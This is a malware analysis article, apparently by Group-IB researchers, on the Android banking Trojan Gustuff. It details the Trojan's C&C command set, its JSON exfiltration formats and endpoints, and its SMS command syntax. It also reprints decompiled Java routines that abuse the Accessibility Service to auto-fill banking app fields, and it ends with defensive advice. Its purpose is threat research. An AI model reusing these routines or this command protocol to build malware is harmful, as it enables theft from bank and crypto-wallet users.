Just the other day Group-IB about the activity of the mobile Android Trojan Gustuff. It operates exclusively on international markets, attacking clients of the 100 largest foreign banks, users of 32 mobile crypto wallets, as well as large e-commerce resources. But the developer of Gustuff is a Russian-speaking cybercriminal under the nickname Bestoffer. More recently, he praised his Trojan as "a serious product for people with knowledge and experience."
Group-IB Malicious Code Analyst Ivan Pisarev in his research he talks in detail about how Gustuff works and what is its danger.
Who is Gustuff hunting for?
Gustuff belongs to a new generation of malware with fully automated features. According to the developer, the Trojan has become a new improved version of the AndyBot malware that has been attacking Android phones since November 2017 and stealing money through phishing web forms masquerading as mobile applications of well-known international banks and payment systems. Bestoffer reported that Gustuff Bot was priced at $800 per month.
Analysis of the Gustuff sample showed that the Trojan is potentially targeting customers using mobile applications of the largest banks, such as Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, as well as Bitcoin Wallet, BitPay crypto wallets. , Cryptopay, Coinbase, etc.
Initially created as a classic banking Trojan, the current version of Gustuff has significantly expanded the list of potential targets for attack. In addition to Android applications for banks, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers. In particular, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.
Entry point: calculation for mass infection
Gustuff is characterized by the “classic” vector of penetration into Android smartphones through SMS mailings with links to APKs. When an Android device is infected with a trojan at the command of the server, Gustuff may further spread through the contact database of the infected phone or through the server database. The functionality of Gustuff is designed for mass infection and maximum capitalization of the business of its operators - it has a unique “auto-fill” function in legitimate mobile banking applications and crypto wallets, which allows you to speed up and scale the theft of money.
A study of the Trojan showed that the autofill function is implemented in it using the Accessibility Service, a service for people with disabilities. Gustuff is not the first Trojan to successfully bypass protection against interaction with window elements of other applications using this Android service. However, the use of the Accessibility Service in combination with autofill is still quite rare.
After downloading to the victim's phone, Gustuff, using the Accessibility Service, gets the opportunity to interact with window elements of other applications (banking, cryptocurrency, as well as applications for online shopping, messaging, etc.), performing the actions necessary for attackers. For example, at the command of the server, the Trojan can click on buttons and change the values of text fields in banking applications. Using the Accessibility Service mechanism allows the Trojan to bypass the protection mechanisms used by banks to counter mobile Trojans of the previous generation, as well as changes in the security policy implemented by Google in new versions of the Android OS. So, Gustuff "knows how" to disable Google Protect protection: according to the author, this function works in 70% of cases.
Gustuff can also show fake PUSH notifications with icons of legitimate mobile applications. The user clicks on the PUSH notification and sees a phishing window downloaded from the server, where he enters the requested data of a bank card or crypto wallet. In another scenario, Gustuff opens the application on behalf of which the PUSH notification was shown. In this case, the malware, at the command of the server through the Accessibility Service, can fill in the form fields of the banking application for a fraudulent transaction.
The functionality of Gustuff also includes sending information about an infected device to the server, the ability to read / send SMS messages, send USSD requests, launch SOCKS5 Proxy, follow a link, send files (including photo scans of documents, screenshots, photos) to the server , reset the device to factory settings.
Malware analysis
Before installing a malicious application, Android OS shows the user a window containing a list of the rights requested by Gustuff:
The installation of the application will take place only after obtaining the consent of the user. After launching the application, the Trojan will show the user a window:
Then it will remove its icon.
Gustuff is packed, according to the author, by the FTT packer. Once launched, the application periodically accesses the CnC server in order to receive commands. In several of the files we studied, the IP address was used as the control server 88.99.171[.]105 (hereinafter referred to as <%C&C%>).
After starting the program starts sending messages to the server http://<%CnC%>/api/v1/get.php.
The following JSON format is expected as a response:
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}With each request, the application sends information about the infected device. The message format is shown below. It should be noted that the fields full, extra, apps и permission – optional and will be sent only in case of a request command from CnC.
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
} Storage of configuration data
Gustuff stores important information in a preference file. The file name, as well as the parameter names in it, is the result of calculating the MD5 sum from the string 15413090667214.6.1<%name%>Where <%name%> is the original name-value. Python interpretation of the name generation function:
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
In what follows, we will denote as nameGenerator(input).
So the name of the first file is: nameGenerator("API_SERVER_LIST"), it contains values with the following names:
| Variable name | Value |
|---|---|
| nameGenerator("API_SERVER_LIST") | Contains a list of CnC addresses as an array. |
| nameGenerator("API_SERVER_URL") | Contains CnC address. |
| nameGenerator("SMS_UPLOAD") | The flag is set by default. If the flag is set, it sends SMS messages to CnC. |
| nameGenerator("SMS_ROOT_NUMBER") | Phone number to which SMS messages received by the infected device will be sent. The default is null. |
| nameGenerator("SMS_ROOT_NUMBER_RESEND") | The flag is cleared by default. If set, when an infected device receives an SMS, it will be sent to the root number. |
| nameGenerator("DEFAULT_APP_SMS") | The flag is cleared by default. If this flag is set, the application will process incoming SMS messages. |
| nameGenerator("DEFAULT_ADMIN") | The flag is cleared by default. If the flag is set, the application has administrator rights. |
| nameGenerator("DEFAULT_ACCESSIBILITY") | The flag is cleared by default. If the flag is set, the service that uses the Accessibility Service is running. |
| nameGenerator("APPS_CONFIG") | JSON object, contains a list of actions to be performed when an Accessibility event is fired associated with a specific application. |
| nameGenerator("APPS_INSTALLED") | Stores a list of applications installed on the device. |
| nameGenerator("IS_FIST_RUN") | The flag is cleared at the first start. |
| nameGenerator("UNIQUE_ID") | Contains a unique identifier. Generated when the bot is first launched. |
Server command processing module
The application stores addresses of CnC servers as an array of coded Base85 lines. The list of CnC servers can be changed upon receipt of the appropriate command, in which case the addresses will be stored in the preference file.
In response to the request, the server sends a command to the application. It should be noted that commands and parameters are presented in JSON format. The application can process the following commands:
| Team | Description |
|---|---|
| forwardStart | Start sending SMS messages received by the infected device to the CnC server. |
| forwardStop | Stop sending SMS messages received by the infected device to the CnC server. |
| ussdRun | Make a USSD request. The number to which you need to make a USSD request is in the "number" JSON field. |
| sendSms | Send one SMS message (if necessary, the message is “split” into parts). As a parameter, the command takes a JSON object containing the fields "to" - the destination number and "body" - the body of the message. |
| sendSmsAb | Send SMS messages (if necessary, the message is "split" into parts) to everyone from the contact list of the infected device. The interval between sending messages is 10 seconds. The body of the message is in the JSON field "body" |
| sendSmsMass | Send SMS messages (if necessary, the message is “split” into parts) to the contacts specified in the command parameters. The interval between sending messages is 10 seconds. As a parameter, the command takes a JSON array (field "sms"), the elements of which contain the fields "to" - the destination number and "body" - the body of the message. |
| changeServer | This command can take a value with the “url” key as a parameter - then the bot will change the value of nameGenerator(“SERVER_URL”), or “array” - then the bot will write the array to nameGenerator (“API_SERVER_LIST”) Thus, the application changes the address of CnC servers. |
| adminNumber | The command is designed to work with the root number. The command accepts a JSON object with the following parameters: "number" - change nameGenerator("ROOT_NUMBER") to the received value, "resend" - change nameGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" - send uniqueID to nameGenerator("ROOT_NUMBER"). |
| updateInfo | Send information about the infected device to the server. |
| wipeData | The command is intended for deleting user data. Depending on which name the application was launched, either the complete erasure of data with a reboot of the device (primary user) or the deletion of only user data (secondary user) occurs. |
| socksStart | Launch the proxy module. The operation of the module is described in a separate section. |
| socksStop | Stop the proxy module. |
| openLink | Follow the link. The link is in the JSON parameter by the "url" key. "android.intent.action.VIEW" is used to open the link. |
| uploadAllSms | Send all SMS messages received by the device to the server. |
| uploadAllPhotos | Send images from the infected device to the URL. The URL comes as a parameter. |
| uploadFile | Send a file from an infected device to a URL. The URL comes as a parameter. |
| uploadPhoneNumbers | Send phone numbers from the contact list to the server. If a JSON object with the key "ab" comes as a parameter, the application receives a list of contacts from the phone book. If a JSON object with the key "sms" is received as a parameter, the application reads the list of contacts from the senders of SMS messages. |
| changeArchive | The application downloads a file from the address that comes as a parameter using the "url" key. The downloaded file is saved with the name "archive.zip". The application will then unzip the file, optionally using the archive password "b5jXh37gxgHBrZhQ4j3D". The unzipped files are saved to the [external storage]/hgps directory. In this directory, the application stores web fakes (described below). |
| actions | The command is designed to work with Action Service, which is described in a separate section. |
| test | Doing nothing. |
| download | The command is designed to download a file from a remote server and save it to the Downloads directory. The URL and the file name come as a parameter, the fields in the JSON object are the parameter respectively: "url" and "fileName". |
| remove | Removes a file from the Downloads directory. The file name comes in a JSON parameter with the "fileName" key. The default file name is "tmp.apk". |
| notification | Show a notification with description and title texts defined by the management server. |
Command format notification:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}The notification generated by the file under investigation looks identical to notifications generated by the application specified in the field app. If the field value open App — True, when the notification is opened, the application specified in the field is launched app. If the field value open App - False, then:
- a phishing window opens, the contents of which are loaded from the directory <%external storage%>/hgps/<%filename%>
- a phishing window opens, the content of which is downloaded from the server <%url%>?id=<%Bot id%>&app=<%Application name%>
- a phishing window disguised as a Google Play Card opens, with the option to enter card details.
The application sends the result of the execution of any command to <%CnC%>set_state.php as a JSON object in the following format:
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
ActionsService
The list of commands that the application processes includes action. When a command is received, the command processing module calls this service to execute the extended command. The service takes a JSON object as a parameter. The service can execute the following commands:
1. PARAMS_ACTION - when receiving such a command, the service first of all receives a value from the JSON parameter by the Type key, it can be as follows:
- serviceInfo – the subcommand gets the value from the JSON parameter by key includeNotImportant. If the flag is True, the application sets the flag FLAG_ISOLATED_PROCESS to a service that uses the Accessibility Service. Thus, the service will be launched in a separate process.
- root - receive and send to the server information about the window that is currently in focus. An application obtains information using the AccessibilityNodeInfo class.
- admin - request administrator rights.
- delay - suspend the ActionsService for the number of milliseconds specified in the parameter by the "data" key.
- windows — send a list of windows visible to the user.
- install — install the application on the infected device. The name of the package - archive is in the "fileName" key. The archive itself is located in the Downloads directory.
- overall – the subcommand is intended for switching from the current window:
- on the Quick Settings menu
- ago
- home
- to notifications
- to the recently opened applications window
- launch - launch the application. The name of the application comes as a key parameter date.
- sounds — change the sound mode to silence.
- unlock - turns on the backlight of the screen and keyboard to full brightness. The application performs this action using WakeLock, specifies the string [Application lable]:INFO as a tag
- permissionOverlay — function not implemented (response to command execution — {"message":"Not support"} or {"message":"low sdk"})
- gesture — function not implemented (response to command execution — {"message":"Not support"}or {"message":"Low API"})
- permissions - This command is required to request permissions for the application. However, the request function is not implemented, so the command is meaningless. The list of requested permissions comes as a JSON array with the "permissions" key. Standard list:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- open — display a phishing window. Depending on the parameter coming from the server, the application can display the following phishing windows:
- Show a phishing window whose contents are written in a file in a directory <%external directory%>/hgps/<%param_filename%>. The result of user interaction with the window will be sent to the address <%CnC%>/records.php
- Show a phishing window whose content is preloaded from an address <%url_param%>?id=<%bot_id%>&app=<%packagename%>. The result of user interaction with the window will be sent to the address <%CnC%>/records.php
- Display a phishing window disguised as a Google Play Card.
- Interactive — the command is designed to interact with window elements of other applications using the AcessibilityService. A special service is implemented in the program for interaction. The application under investigation can interact with windows:
- Active at the moment. In this case, the parameter contains the id or text (name) of the object with which you want to interact.
- Visible to the user at the time the command is executed. The application selects windows by id.
Having received the objects AccessibilityNodeInfo for window elements of interest, the application, depending on the parameters, can perform the following actions:
- focus - set focus to an object.
- click - click on an object.
- actionId - perform an action by ID.
- setText - change the text of the object. Changing the text is possible in two ways: perform an action ACTION_SET_TEXT (if the Android version of the infected device is younger than or equal to LOLLIPOP), or by placing a string on the clipboard and pasting it into an object (for older versions). This command can be used to change data in the banking application.
2. PARAMS_ACTIONS - the same as PARAMS_ACTION, only a JSON array of commands arrives.
It seems that many will be interested in how the function of interacting with the elements of the window of another application looks like. This is how this functionality is implemented in Gustuff:
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}Text replacement function:
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}Thus, with the correct configuration of the control server, Gustuff is able to fill in the text fields in the banking application and click on the buttons necessary to complete the transaction. The Trojan does not even need to pass authorization in the application - it is enough to send a command to demonstrate a PUSH notification, followed by opening a previously installed banking application. The user himself will be authorized, after which Gustuff will be able to autofill.
SMS processing module
The application sets an event handler for receiving SMS messages by the infected device. The application under study can receive commands from the operator that come in the body of an SMS message. Commands come in the format:
7!5=<%Base64 encoded command%>
The application searches all incoming SMS messages for the string 7!5=, when a string is found, it decodes the string from Base64 at offset 4 and executes the command. The commands are similar to the commands with CnC. The result of the execution is sent to the same number from which the command was received. Response format:
7*5=<%Base64 encode of "result_code command"%>
Optionally, the application can send all received messages to the Root number. To do this, the Root number must be specified in the preference file and the message redirect flag must be set. An SMS message is sent to the attacker's number in the following format:
<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>
Also, optionally, the application can send messages to the CnC. The SMS message is sent to the server in JSON format:
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}If the flag is set nameGenerator("DEFAULT_APP_SMS") – the application stops processing the SMS message and clears the list of incoming messages.
Proxy module
In the application under study, there is a Backconnect Proxy module (hereinafter referred to as the Proxy module), which has a separate class that includes static fields with a configuration. Configuration data is stored in the sample in clear text:
All actions performed by the Proxy module are logged to files. To do this, the application creates a directory called "logs" in External Storage (the ProxyConfigClass.logsDir field in the configuration class), in which log files are stored. Logging takes place in files with names:
- main.txt – this file is used to log the work of the class named CommandServer. In what follows, the logging of the string str to this file will be denoted as mainLog(str).
- session-<%id%>.txt — log data associated with a certain proxy session is saved to this file. In what follows, the logging of the string str to this file will be denoted as sessionLog (str).
- server.txt – this file is where all the data written to the above files is logged.
Log data format:
<%Date%> [Thread[<%thread id%>], id[]]: log-string
Exceptions that occur during the operation of the Proxy module are also logged to a file. To do this, the application generates a JSON object of the format:
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}Then it converts it to a string representation and logs.
The proxy module is launched after the corresponding command arrives. When a command is received to start the proxy module, the application starts the service with the name MainService, which is responsible for managing the operation of the Proxy module - starting and stopping it.
Service launch steps:
1. Starts a timer that fires once a minute and checks the activity of the proxy module. If the module is not active, it starts it.
Also when the event fires android.net.conn.CONNECTIVITY_CHANGE the proxy module is launched.
2. The application creates a wake-lock with a parameter PARTIAL_WAKE_LOCK and captures him. Thus, it does not allow the CPU of the device to go into sleep mode.
3. Runs the command processing class of the proxy module, logging the line first mainLog("startserver") и
Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]
where proxy_cnc, command_port and proxy_port – parameters received from the proxy server configuration.
The command processing class is named CommandConnection. Immediately after launch, it performs the following actions:
4. Connects to ProxyConfigClass.host: ProxyConfigClass.commandPort and sends data about the infected device there in JSON format:
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}Where:
- id - identifier, trying to get from the Shared Preference file with the name "x" a value with the "id" field. If this value could not be obtained, it generates a new one. Thus, the proxy module has its own identifier, which is generated similarly to the Bot ID.
- imei - IMEI of the device. If an error occurred while getting the value, an error text message will be written instead of this field.
- imsi - International Mobile Subscriber Identity of the device. If an error occurred while getting the value, an error text message will be written instead of this field.
- model - The end-user-visible name for the end product.
- manufacturer - The manufacturer of the product/hardware (Build.MANUFACTURER).
- androidVersion is a string in the format "<%release_version%> (<%os_version%>),<%sdk_version%>"
- country is the current location of the device.
- partnerId is an empty string.
- packageName - packagename.
- networkType - type of current network connection (example: "WIFI", "MOBILE"). Returns null on error.
- hasGsmSupport - true - if the phone supports GSM, otherwise false.
- simReady - SIM card status.
- simCountry - ISO code of the country (based on the SIM card provider).
- networkOperator - the name of the operator. If an error occurred while getting the value, an error text message will be written instead of this field.
- simOperator - The Service Provider Name (SPN). If an error occurred while getting the value, an error text message will be written instead of this field.
- version - this field is stored in the config class, for the studied versions of the bot it was equal to "1.6".
5. Switches to the mode of waiting for commands from the server. Commands from the server come in the format:
- 0 offset-command
- 1 offset-sessionId
- 2 offset-length
- 4 offset-data
When a command is received, the application logs:
mainLog("Header { sessionId<%id%>], type[<%command%>], length[<%length%>] }")
The following commands are possible from the server:
| Name | Command | Data | Description |
|---|---|---|---|
| connectionId | 0 | Connection ID | Create a new connection |
| SLEEP | 3 | Time | Suspend the proxy module |
| PING_PONG | 4 | — | Send PONG message |
A PONG message consists of 4 bytes and looks like this: 0x04000000.
When a connectionId command is received (to create a new connection) CommandConnection creates an instance of the class ProxyConnection.
- Two classes take part in proxying: ProxyConnection и end. When creating a class ProxyConnection connection is made to the address ProxyConfigClass.host: ProxyConfigClass.proxyPort and passing a JSON object:
{
"id":<%connectionId%>
}In response, the server sends a SOCKS5 message containing the address of the remote server to which the connection must be established. Interaction with this server occurs through the class end. Schematically, the connection setup can be represented as follows:
Network interactions
To prevent network sniffers from analyzing traffic, the interaction between the CnC server and the application can be secured using the SSL protocol. All transmitted data both from the server and to the server are in JSON format. The application performs the following requests during operation:
- http://<%CnC%>/api/v1/set_state.php is the result of command execution.
- http://<%CnC%>/api/v1/get.php - receiving a command.
- http://<%CnC%>/api/v1/load_sms.php — downloading SMS messages from an infected device.
- http://<%CnC%>/api/v1/load_ab.php — uploading the list of contacts from the infected device.
- http://<%CnC%>/api/v1/aevents.php – the request is made when updating the parameters in the preference file.
- http://<%CnC%>/api/v1/set_card.php - uploading data obtained using a phishing window masquerading as the Google Play Market.
- http://<%CnC%>/api/v1/logs.php – unloading log data.
- http://<%CnC%>/api/v1/records.php – uploading data obtained using phishing windows.
- http://<%CnC%>/api/v1/set_error.php – error notification.
Recommendations
In order to protect their customers from the threat of mobile Trojans, companies must use comprehensive solutions that allow, without installing additional software on users' devices, to monitor and prevent malicious activity.
To do this, signature-based methods for detecting mobile Trojans need to be enhanced with technologies for analyzing the behavior of both the client and the application itself. Also, protection should include the function of identifying devices using digital fingerprint technology, which will make it possible to understand when an account is used from an atypical device and has already fallen into the hands of a fraudster.
A fundamentally important point is the possibility of cross-channel analysis, which allows companies to control the risks that arise on the side of not only the Internet, but also the mobile channel, for example, in applications for mobile banking, for transactions with crypto-currencies and any other where it can be carried out. financial transaction.
Security rules for users:
- do not install applications for a mobile device with Android OS from any sources other than Google Play, pay special attention to the rights requested by the application;
- regularly install Android OS updates;
- pay attention to the extensions of uploaded files;
- do not visit suspicious resources;
- Do not click on links received in SMS messages.
Starring Semyon Rogachev, Associate Malicious Code Researcher, Group-IB Computer Forensics Lab.
Source: habr.com